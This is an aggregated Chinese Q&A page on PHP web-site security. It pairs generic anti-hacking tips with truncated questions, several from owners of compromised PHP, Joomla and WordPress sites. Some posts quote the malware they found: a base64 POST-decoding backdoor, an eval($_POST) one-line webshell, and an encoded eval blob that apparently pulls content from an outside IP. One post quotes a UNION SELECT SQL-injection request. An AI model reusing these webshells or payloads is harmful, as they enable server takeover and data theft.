PHP:防止文件夹黑客攻击 - 如果路径中有../?
PHP: 防止文件夹黑客攻击
在PHP中,为了防止黑客攻击,可以通过一些安全措施来确保网站和用户数据的安全。以下是一些防止黑客攻击的方法:
- 限制文件上传:禁止用户上传文件,以减少黑客攻击的可能性。
- 使用安全路径:在路径中使用安全路径,以避免暴露服务器上的敏感文件。
- 隐藏PHP信息:通过隐藏PHP信息,可以保护服务器和网站的信息。
- 使用HTTPS:使用HTTPS来保护数据传输的安全。
- 限制访问权限:限制访问权限,以减少黑客攻击的可能性。
- 定期更新:定期更新软件和操作系统,以修复漏洞和缺陷。
- 使用杀毒软件:使用杀毒软件来保护服务器和网站不受恶意软件的侵害。
- 备份数据:定期备份数据,以便在发生攻击时能够恢复数据。
总之,防止黑客攻击需要多种措施的综合使用,以保护网站和用户数据的安全。
相关·内容
将php/mysql web应用程序放在(有信誉的)托管服务器上的受密码保护的文件夹中是否安全?
感谢您能提供的任何见解!
浏览 3提问于2009-04-25得票数 1
在我的modx资产->图像中有奇怪的php文件
cklxt.php.php.php.php
cklxt.php.php.php.php.php
如果我打开它们,代码似乎与图像无关:
<?php
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb']));
$xuoh = stripslashes(base64_decode($_POST['maih']));
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepoueb
浏览 4提问于2017-05-08得票数 1
我已经在子域中安装了WHMCS,并且我遵循了WHMCS中列出的安装步骤,包括:
完成后,从web服务器中删除安装文件夹,并将configuration.php文件恢复到644。必需的文件和文件夹权限
/configuration.php CHMOD 400可读
可写/attachments CHMOD 777
可写/downloads CHMOD 777
可写/templates_c CHMOD 777
除非您的php是suPHP或PHPSuExec,否则上述情况除外。如果使用DSO作为php处理程序,则必须使用644个权限。
这似乎没什么意义。
最近,当我试图访问该站点时,我收到以下消息:
浏览 0提问于2015-10-20得票数 2
php中有一个很好的工具,可以将php文件归档为"phar“格式,使其易于分发和安装。它可以为整个php文件夹创建一个"phar“文件。
使用之类的工具,可以轻松地将phar文件“解压”到其原始文件夹中
现在,我的问题是,有没有办法,我们可以添加一些密码或随机盐,同时生成phar文件,使其不会很容易被破解?我的动机是保护php脚本不被修改。
浏览 7提问于2014-04-19得票数 0
这就是问题所在。我正在主持大约20个Wordpress网站在一个主机。当我从病毒中清除一个网站时(.ico文件将代码注入到index.php中),另一个已经清理过的网站被再次注入(在几个小时或几天内)。
对所有sql基进行备份和删除所有文件的解决方案-对我不起作用-因为在一些网站中,我的小自定义脚本(没什么,只是在html中做了很小的修改,非常肯定我没有错误地创建漏洞)。
所以我的问题是:
是否有可能在cPanel中分离主目录,这样每个网站都会彼此分离?
如果不是,将文件管理器中的权限更改为例如544将停止编辑文件?
关于如何永远删除这个黑客和所有后门,还有其他解决方案吗?
浏览 0提问于2018-08-26得票数 0
我已经在易街云实例上发布了我的网站。它是Windows 2012 R2。但从几个月开始我就面临一个问题。我发现一些新的文件夹创建在我的网站根目录。该文件夹包含一些代码和注释的经典ASP页面,这是中文。
有没有其他方法来限制黑客上传任何文件夹/文件到我的网站。
例如。上传到根文件夹上的Z1.asp文件。
浏览 3提问于2016-12-07得票数 1
回答已采纳
1回答
可能重复: 我的服务器被黑客入侵
在日志中,我发现那个网站被黑客扫描了几个小时,但我认为真正的黑客攻击只有几分钟。
他不知何故发现了我所有的文件--甚至没有缓存任何地方的文件夹和文件--比如robots.txt,或者甚至没有看到google.com --它只是我创建的随机文件名--我确信他不知道它们,所以他怎么能找到它们呢?
他的另一个窍门是,他找到了我用来上传图片到主页滑块的php文件,他上传了他的文件让我们称之为"hack.jpg“通过它。有趣的是,"hack.jpg“是几行php脚本,可以上传更多的文件。而且,他能够以php脚本的形式运行hack.jpg文件,而不需要将
浏览 0提问于2012-07-24得票数 -3
我得到了一个500内部服务器错误时,试图安装螺栓。
第一次使用Bolt (使用Drupal已有几年)。
我正在运行一个VPS (带有cPanel/WHM)。
PHP版本5.4.37,Apache版本2.4.12
PHP memory_limit =128 m
启用了PDO扩展、curlssl扩展和GD扩展
Chrome版40.0.2214.111
mod_rewrite,SQLite和MySQL 5.6.22
下载最新版本并安装传统方式(FTP)
解压缩和更新权限
.htaccess在那里,看起来与螺栓安装页面中引用的相同。
我尝试了MySQL数据库
浏览 5提问于2015-02-06得票数 0
回答已采纳
我在AWS EC2上托管了一个EC2站点。在我的WordPress目录下有很多随机文件。
$ ls
0gikql 5wrCju b8O49g f4GMY8 HYA9ej kDQYM5 mo0VOK P4GJE9 readme.html sztmJh vmopCD WYurax
0Nt3ai 6IxnR2 BJPmv3 F9UewA i05cZx KoILCl Mpo23r P9urRg RikuD
浏览 0提问于2020-05-01得票数 1
回答已采纳
所以我有一个Config文件设置,我不能使用一个简单的../等等。如果可能的话,我需要能够使用完整的服务器路径。原因是,我有多个页面,其中包含了这些内容,但是,有些页面位于包含类文件夹的实际主文件夹之外。而且由于我需要,所以我得到了一些错误,比如Classes/class.php没有找到。这有道理吗?
以下是我的Config文件可能更有意义:
<?php
session_start();
$GLOBALS['config'] = array(
'mysql' => array(
'host' => 'url&#
浏览 7提问于2015-05-28得票数 0
回答已采纳
我有一个本地视频播放在iPad上的Safari,我不能移动洗涤器(视频位置选择器)。这是视频的代码。
<video id="video-area" controls>
<source src="videos/person.mp4" type="video/mp4">
</video>
这个项目中有很多代码,但是我已经缩小了那些干扰我在Safari上防止过度滚动(反弹)的代码的搜索的代码。
document.ontouchmove = function(event){
event.pre
浏览 2提问于2016-09-30得票数 0
回答已采纳
我正在使用"Laravel“学习Laravel。在本书的“表单安全性”一节中,它讨论了在使用Form::Open()方法生成表单输入时,Laravel如何生成秘密隐藏代码以防止"CSRF -跨站点请求伪造“。
我尝试了一个示例来访问将使用外部表单处理表单的路由。首先,我没有“之前,”“=>”csrf“过滤器附加到路由,我得到了我期待的答案,即外部形式能够访问路由。
对于第二个测试,我在“=>”csrf“过滤器”之前向路由添加了“”。当我单击外部表单的submit按钮时,页面持续加载了很长时间,并且没有显示任何结果就放弃了,页面是空白的。这意味着“”之前的“=>
浏览 2提问于2015-07-15得票数 2
回答已采纳
我是joomla world的新手。请告诉any1如何在joomla 3.0中使用引导大小选项?
我还有一个问题,在每个没有内容的模块文件夹中使用index.html有什么用?
浏览 0提问于2013-05-20得票数 0
为什么细枝原始过滤器在drupal上下文中是不安全的?
什么是潜在威胁的例子?
如果使用原始筛选器,那么在ckeditor字段格式方面需要做什么来保护潜在的恶意代码?
浏览 0提问于2023-02-22得票数 1
1回答
封锁IP地址的自动化
、、、、
我有一个Ubuntu12.04机器运行Apache2,其中托管了大约10个wordpress网站。
最近,我受到客户的攻击,这些客户似乎正在向一个名为“xmlrpc.php”的wordpress文件发送帖子请求。
我阻止发送这些恶意请求的IP地址的方式是一个繁琐的手工过程,我想以某种方式实现自动化。
一旦我注意到我的服务器负载很高,我就执行以下操作:
我在所有虚拟主机访问文件上运行apachetop。这显示了正在发出的所有请求,因此我可以看到是否有向xmlrpc.php发出的请求
一旦识别出哪个IP攻击了我的服务器,我将对每个违规的IP地址运行以下命令:sudo iptables -A INP
浏览 0提问于2013-09-09得票数 0
我不能传递这个错误信息。
谢谢
The term 'power-date.ps1' is not recognized as the name of a cmdlet, function, script file
, or operable program. Check the spelling of the name, or if a path was included, verify t
hat the path is correct and try again.
At line:1 char:15
+ power-date.ps1 <<<<
浏览 0提问于2013-05-16得票数 0
2回答
我即将推出一个网站(红宝石rails)与技术知识共享。它应在AWS上托管。我正在特别寻找一个清单,为“最佳安全做法”。我想做几件事如下。
安全标头http重定向
想要更多。
浏览 2提问于2022-05-06得票数 0
3回答
我在运行一个Joomla 1.7网站,它今天被黑了。下面的脚本完成了黑客攻击。
eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJ
浏览 4提问于2013-02-20得票数 3
回答已采纳
2回答
我是php的新手,通过阅读SO上列出的一些问题,我成功地将这个简单的下载脚本串在了一起,并想请那些更熟悉php的人看看下面的代码,看看我的实现是否有任何明显的缺陷或任何应该改变的地方。
只想让你知道,在我有限的测试期间,一切似乎都很好,但正如我所说的,我是php的新手,希望确保我不会遗漏一些可能会在以后破坏脚本的东西。
<?php
//Settings
$filesPath = './files';
$fileName = $_GET['file'];
$allowedExts = array('jpg','png
浏览 3提问于2012-03-13得票数 2
2回答
我希望有人能在这里帮助我,我正在创建一个PHP web应用程序,它需要用户登录才能查看mysql数据库中的数据。
我只想知道这是否是一个好方法,它是否足够安全?我知道在PHP脚本中没有什么是安全的,但我需要相当安全。
所以,这是我一步一步地做的,如果你能指出我在正确的方向,告诉我什么是错误的,那将是伟大的!
用户使用用户和密码登录。
PHP根据数据库检查用户和密码。
如果确定,我将$SESSION"username";(即用户名)存储到会话中。
在每次加载请求/页面时,我都有一个函数(下面)来检查会话。
函数check_session_valid(){ chec
浏览 3提问于2014-12-24得票数 4
回答已采纳
2回答
我的joomla站点被黑了,我在库文件夹中得到了一个文件,那就是reads.php文件。当我打开这个文件时,发现只有一行是
<?php @eval($_POST[1]); ?>
我不明白什么数据黑客会得到这一行。请推荐我。
浏览 2提问于2016-04-02得票数 4
2回答
当我创建新的dtb条目时,我理解了hash+salt的概念。如果我有一些固定字符串的盐,它可能不是很难实现,但如何做,当我想使用用户的生日作为一个盐?将密码保存到数据库很容易,但是如何在登录期间散列呢?我在googled中搜索了我的applicationContext-security.xml文件的这段代码,其中他们将username值用于salt:
<!-- authentication from database -->
<security:authentication-manager>
<security:authentication-provide
浏览 4提问于2013-08-16得票数 1
回答已采纳
我有运行wordpress 4.2.3的CentOS Linux 7,在他的新版本中也安装了重力表单插件。
插件使用以下指令在他的上传文件夹中创建了一个htaccess文件:
# BEGIN Gravity Forms
# Disable parsing of PHP for some server configurations. This file may be removed or modified on certain server configurations by using by the gform_upload_root_htaccess_rules filter. Please
浏览 1提问于2015-08-03得票数 0
1回答
我正在尝试将我的wamp服务器从php5升级到php7 (我知道我有点落后于时间),在服务器启动时,我得到了这个错误
PHP启动:无法加载动态库'intl‘(尝试:C:\PHP 73\ext\intl(找不到指定的模块),C:\PHP73\ext\php_intl.dll (找不到指定的模块)。在第0行中未知
我试着在网络上搜索不同的地方,寻找答案,但似乎没有什么效果。
我已经安装了Apache2.4和PHP5.6,并且正在尝试升级到php7.2。我已经完全注释掉了Apachehttpd.conf中对php5的所有引用,并将其替换为php7
#LoadModule php5_m
浏览 1提问于2019-01-31得票数 1
回答已采纳
1回答
出于安全考虑,每个请求都会传递给PHP,因为我不想向未经授权的人公开静态文件。
我担心有人通过$_SERVER["REQUEST_URI"]变量注入一些恶意代码的可能性。我试图删除子文件夹引用,但我仍然不知道它是否安全。
Nginx
rewrite ^ /index.php last;
index.php
<?php
$uri = $_SERVER["REQUEST_URI"];
$uri = strlen ($uri) > 1 ? substr ($uri, 1) : "index.html";
$uri =
浏览 4提问于2013-01-07得票数 1
回答已采纳
2回答
好了,我的一个网站(在joomla上)被黑客入侵了,就像第6次……
我不会给你讲任何故事。只有事实:
首先,我发现在模板索引文件中出现了一些外来代码:
<div id='hideMe'> <p>Every person knows the large quan...|...ur cure Viagra <a href="xxxxx">Viagra</a> </div><script type='text/javascript'>if(document.getElementBy
浏览 0提问于2012-10-19得票数 5
回答已采纳
1回答
将图像上传到数据库时的扩展问题
、、、、
我需要帮助解决我的问题。我想在我的数据库中上传多张图片。我将路径放在我的数据库中,图像放在文件夹中。我认为上传是可行的,但如果我看到数据库中的路径,则如下所示:
projects/projects_past/benefits.pnh
图像的扩展应该是.png,为什么我要取这个.pnh?
我问用户你想上传多少张图片?例如3,所以我在同一个php文件中给他三个输入类型文件来上传它们。提交后,将重定向到另一个php,我将图像插入到数据库中。
第一个php文件具有以下代码:
if($submit_num_images)
{
echo "<form action='img_proj
浏览 3提问于2012-11-23得票数 0
回答已采纳
1回答
安全地存储大图像的正确做法
、、、、
在iOS上存储大图像的正确方法是什么,其中“大”表示> 1MB?
此外,我希望防止用户有能力通过某种黑客来访问它们。
浏览 0提问于2011-05-03得票数 1
回答已采纳
该网站抛出了500个错误。我可以看到在所有wordpress核心文件夹中生成的frmtmp.php文件。当我删除这些文件的时候,它们还会不断地回来。
浏览 2提问于2016-04-26得票数 0
回答已采纳
有一段时间,我试图将文件从windows主机上的Wampserver保存到远程共享文件夹(\192.168.1.134)。我在PHP中运行了一个.bat脚本,但是没有保存任何东西。该脚本运行良好,因为我可以从CMD提示符执行它,而且我还可以运行另一个写入.txt的.bat脚本(在主机上)。
因此,我确信这不是因为我的PHP脚本,而是因为Wampserver获得的权限(我可以很容易地在与host共享的文件夹上写入和编辑文件)。
我读到Wampserver可能会以另一个用户身份运行,但我不知道如何操作。那么,即使我更改了用户,我也可以在哪里检查它是否有权编辑共享文件夹中的文件?
谢谢你的帮助!
浏览 21提问于2021-10-12得票数 0
谁有经验和建议来找到源,并停止在我的客户的Wordpress网站上的ftp黑客托管在BlueHost上?黑客们能够做到以下几点:
创建多个具有诸如ss-ee4f8275917dfe28等用户名的ftp帐户,指向文件夹/tmp/simplescripts/和/public_html/
将名为MMprobe-N5ayJ.php的php文件上载到public_html文件夹
浏览 0提问于2019-07-19得票数 1
我们有乔姆拉2.5.8。在此路径/public_html/modules/mod_jacontentslider/assets/css中创建了病毒文件list.php。
这个文件不间断地发送垃圾邮件。
我们认为它是php黑客并更新到了php的最新版本,并升级了Joomla2.5.11,我们再次受到同样的攻击。
有什么想法吗?
更新
我试图将这个受感染的文件(list.php)下载到我的windows 7 PC上。Microsoft安全要害软件检测到病毒,不允许我下载该文件。
那么,在linux (CentOS 5.9)端是否有软件可以定期扫描文件并自动删除坏文件或通知我们?我们安装了蛤蜊,但没
浏览 7提问于2013-07-30得票数 4
回答已采纳
我正在尝试设置一个重定向到一个内部链接与php。基本上,我正在使用jquerymobile做一个应用程序,导航需要你在div中导航,而不是在文档中导航。但是,我计算出的代码如下所示
if (isset($_POST['insert'])) {
$post = $_POST['wish'];
$fk_id = $_SESSION['id'];
$succes = "";
$succes .= "<h1>SUCCES</h1>";
$insert_wish
浏览 1提问于2013-05-23得票数 1
我的网站托管在不同的服务器上,一次又一次地使用相同的base64恶意代码。当我解码base64代码时,我得到了mbrowserstats.com/statH/stat.php的链接。
请注意:我的网站与核心php和wordpress也被黑客攻击。他们在以下文件中放置base64恶意代码- index.php、main.php、footer.php、wordpress模板文件(index.php、main.php、footer.php)、wp中的index.php文件、插件、主题文件夹等。
我已经尝试了下面的东西,但所有的网站都是一次又一次被黑。
更改了所有ftp密码
将ftp客户端fi
浏览 0提问于2013-08-10得票数 1
回答已采纳
4回答
防止/..用户输入
、、、
我在一个文件夹中有一个php脚本(我称之为根文件夹)。该脚本基本上可以列出这个根文件夹的子文件夹中的所有文件。用户可以通过使用GET-parameters指定应该显示哪个子文件夹。
script.php?foo
将显示的内容
<root folder>/foo/
而script.php?.bar将显示
<root folder>/.bar/
然而,用户也可以“作弊”,并使用/..等命令来显示他们无法看到的文件夹内容。
例如,使用
script.php?/../..
用户可能会在文件夹层次结构中处于非常高的位置。
你知道如何防止用户像这样做“作弊”吗?
为简单起见,假设G
浏览 2提问于2012-02-25得票数 2
回答已采纳
5回答
通过url进行PHP攻击
、、、
我的网站最近遭到攻击,在日志中我发现了一些请求,比如:
我在我的根目录中发现了一些可疑的文件和文件夹,有人在主页上写到“你被黑了”。
其中一个文件夹是"lentenfish“,它有"sql.php”、"cof.pl“、".htaccess”、"jen.jeen“等文件。
mysite.com/view_news.php?id=-999.9联合所有选择0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x3130323534
浏览 5提问于2011-05-09得票数 2
回答已采纳
1回答
我的远程服务器具有这样的结构(Laravel应用程序):
- laravel
----app
----bootstrap
----(etc.)
- public_html
----js
----css
----index.php
----(etc)
但是,我的本地结构是laravel的默认结构
---app
---bootstrap
---(etc)
---**public** (remote's public_html)
我有两个FTP用户。一个是"laravel“,它的远程根文件夹是"laravel”。另一个是“公共”,它的远程文件夹是"public_ht
浏览 3提问于2015-10-06得票数 0
回答已采纳
我需要使一个上传的文件在我的网站上公开声明几分钟,但保持它的安全。创建一个临时的长随机命名文件夹足够了吗?
PHP脚本将创建文件夹,使其可用,然后删除它。我还会每15分钟运行一次cron作业(在共享主机允许的情况下)删除超过15分钟的任何文件夹,以防脚本在删除之前中止。
提前谢谢。
编辑对不起,应该提供更多的信息。该文件正在使用进行转换,他们需要文件的URL来转换它的格式。我想我能找到api提供者的IP?
浏览 2提问于2013-09-27得票数 0
在我的登录表单中,或者在登录之后,使用$_SESSION['path']存储根文件夹的绝对路径,然后在项目中的其他位置调用该文件夹是否安全?使用:include_once($_SESSION['path'] . "folder/file.php")。
浏览 4提问于2019-04-08得票数 0
我正在将图片保存在文件夹中的网页文件夹下:
网络/媒体/照片
在显示照片的模板中,我有以下片段:
<?php echo link_to(image_tag('media/photo/filename.jpg', '@some_url); ?>
当我显示视图时,虽然照片显示正确,并且链接正常,但我的php_errors.log文件中有以下错误:
动作“媒体/照片”不存在。
为什么symfony试图将图像的路径解析为url?
有人知道怎么解决这个问题吗?
浏览 7提问于2010-06-17得票数 0
1回答
我的rails项目中有一些静态HTML页面。他们需要访问我的供应商资产文件夹中的样式表。我如何添加正确的引用,因为它们不使用相同的应用程序布局?我尝试直接在供应商文件夹中添加对工作表的引用。这在开发期间有效,但在部署时失败,因为资源已编译,单个工作表不再存在。
浏览 0提问于2013-07-07得票数 1
1回答
最近,我在nginx/php托管网站上看到更多关于get/post参数的日志错误。我有一些基本的检查(消毒),但我认为我做得还不够。
我的一些检查揭示了对"id“参数的尝试:
Parameter ID was not a number! Parameter was: function id() {
var s = '';
while (s.length < 32) {
s = Math.random().toString(36).replace(/[^A-Za-z]/g, '');
}
return s;
}" while rea
浏览 2提问于2015-11-06得票数 0
我开发了一个小型的webservice,它将用户查询并返回数据作为json响应。一切都很好。但我想知道如何设置和比较来自客户端的授权令牌,作为curl头的一部分。这是我发送请求的代码。不过,我仍然没有在FetchData.php上设置任何验证内容。我想在FetchData.php上实现这一点。如何实现这一点?
$query = "select * from product_details where id = 2";
$query_params = array("query" => $query);
$url = "http://localhos
浏览 2提问于2018-11-19得票数 2
回答已采纳
2回答
当用户单击表单上的submit按钮时,我使用它来要求文件。此代码是在blog.php中定位的。当我在文件夹/include/中有这个文件时,代码工作得很好,但是我希望这个文件位于根文件夹中。当我将它添加到根文件夹中时,会得到以下错误:
警告:要求(./include/addbloguser.php):未能打开流:第27行C:\xampp\htdocs\Pentaslash\blog.php中没有这样的文件或目录
致命错误: C:\xampp\htdocs\test\blog.php中的第27行要求‘../include/addbloguser.php’(include_path=.;C:\x
浏览 2提问于2016-03-20得票数 1
回答已采纳
我的网站已经被黑客入侵,我想开始一个干净的板子,但当我删除一些文件夹,网站停止工作。
那么,我怎么知道我可以安全地删除哪些内容呢?
📷
以下是文件列表:
1cache
advanced-cache.php
ai1wm-backups
aiowps_backups
cache
index.php
plugins
themes
upgrade
uploads
w3tc-config
wflogs
wp-cache-config.php
下面是使用的插件:
akismet.4.0.8
all-in-one-schemaorg-rich-snip
浏览 0提问于2018-09-16得票数 0
这里不是程序员或PHP专家:请假定入门级知识。
出于安全考虑,我想将我的主index.php文件夹中的WordPress内容分配给其他东西--比如fish.php,只需要一个调用它的index.php,如下所示:
<html>
<body>
<?php include 'fish.php'; ?>
</body>
</html>
fish.php文件将包含通常在index.php中的所有内容。它只会被命名为fish.php。
这会完全破坏WordPress吗?一个完整的、详细的index.php文件对它的工作是绝对
浏览 2提问于2013-11-10得票数 0
回答已采纳
我知道php是开源的,但我只希望我能打开我的php文件,而不是任何有我代码的人。例如,当服务器被黑客攻击时,黑客很容易打开我的php文件并复制sql用户名和密码,所以这对我的代码不好。
浏览 1提问于2014-01-04得票数 0
我在亚马逊网络服务的EC2服务器上有一个WordPress博客。我按照亚马逊网络服务的this教程,配置了拥有apache:apache的目录2775和文件0664的web root /var/www/html权限,我可以正常地安装我的网站并通过wordpress进行编辑。 然而,上周我注意到网站上有一些奇怪的行为,当我查看网站根目录时,我发现一个新的目录被创建了,里面全是垃圾的php文件。该目录具有随机名称和所有权apache:apache 这是一个SSL服务器,所以它在端口80和442上有0.0.0.0的访问权限(我通过LetsEncrypt和HSTS有SSL)。 我的问题是:某人如何能
浏览 19提问于2019-03-12得票数 1
4回答
请耐心等待,我只学了几个星期的PHP,所以示例代码可能会让我感到困惑。我想我终于能理解腌制了!这是为了保护数据库中的密码,如果被攻破了。
我不明白的是,如果黑客试图破解用户的密码(假设这是他们的目标),为什么他们必须破解哈希?这不是更简单吗?对密码猜测的唯一防御是实施一天输入X次密码的限制还是验证码?
首先,数据库是如何被黑客入侵的?是更多的密码猜测,还是可以通过MySQL注入获得哈希?
谢谢!
浏览 0提问于2010-07-15得票数 2
回答已采纳
下面的代码仅给出一个error.The查询就可以直接在phpmyadmin上工作,但是在我的php代码中:
数据库错误--您的SQL语法中有错误;请检查与您的MySQL服务器版本相对应的手册,以查找在行处使用“\‘to \”、“消息”、“from\’”的正确语法。但我不知道为什么?
<?php
$con = mysqli_connect("localhost","","","");
if (!$con)
{
echo" Not connected to database";
die('
浏览 6提问于2014-01-25得票数 1
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
